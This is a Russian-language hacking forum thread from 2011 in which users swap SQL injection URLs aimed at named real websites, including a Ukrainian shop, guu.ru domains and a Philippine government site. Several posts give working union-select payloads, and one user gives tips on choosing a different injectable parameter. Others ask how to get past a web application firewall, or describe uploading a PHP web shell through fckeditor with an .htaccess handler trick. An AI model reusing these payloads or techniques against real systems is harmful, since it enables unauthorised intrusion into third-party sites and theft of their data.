ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.12.2011, 02:13
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Сообщение от None
Найдено достаточно много товаров, пожалуйста уточните поисковый запрос
|
|
|
04.12.2011, 05:06
|
|
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
Провел на форуме:
862722
Репутация:
54
|
|
Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить. |
|
|
|
04.12.2011, 06:28
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от AnGeI
Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить. Иньекции нету
|
|
|
|
04.12.2011, 08:48
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от AnGeI
Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить. A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие
Код HTML:
http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f
|
|
|
|
04.12.2011, 14:51
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:
Код:
http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4
На этой странице выдало:
Код:
Site.com Driver Error
There appears to be an error with the database.
If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.
You can try to refresh the page by clicking here
Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь? |
|
|
|
04.12.2011, 15:09
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
Провел на форуме:
35174
Репутация:
-6
|
|
I have a problem here.
Код:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8
Код:
WebKnight Application Firewall Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.
What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.
For more information on WebKnight: http://www.aqtronix.com/WebKnight/
AQTRONIX WebKnight
How do I execute? |
|
|
|
04.12.2011, 15:12
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
XSS
У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?
|
|
|
|
04.12.2011, 16:05
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от shadowrun
Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Бро, другой параметр пробуй
Код HTML:
http://www.hobbyshop.com.ua/goods.php?id=4766'-999.9+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--+f
|
|
|
|
04.12.2011, 17:16
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от BlooD_BASH
У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?
Политика безопасности браузеров. Для жс запрет на работу с фс.
|
|
|
|
04.12.2011, 19:28
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Привет, помогите разобраться:
На сайте есть fckeditor 2.3.2, Заливаю шелл smile.php.gif > smile_php.gif и хтацес, в котором
SetHandler application/x-httpd-php
При заходе на шелл target.com/files/smile_php.gif его просто качает..
В чем проблема ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
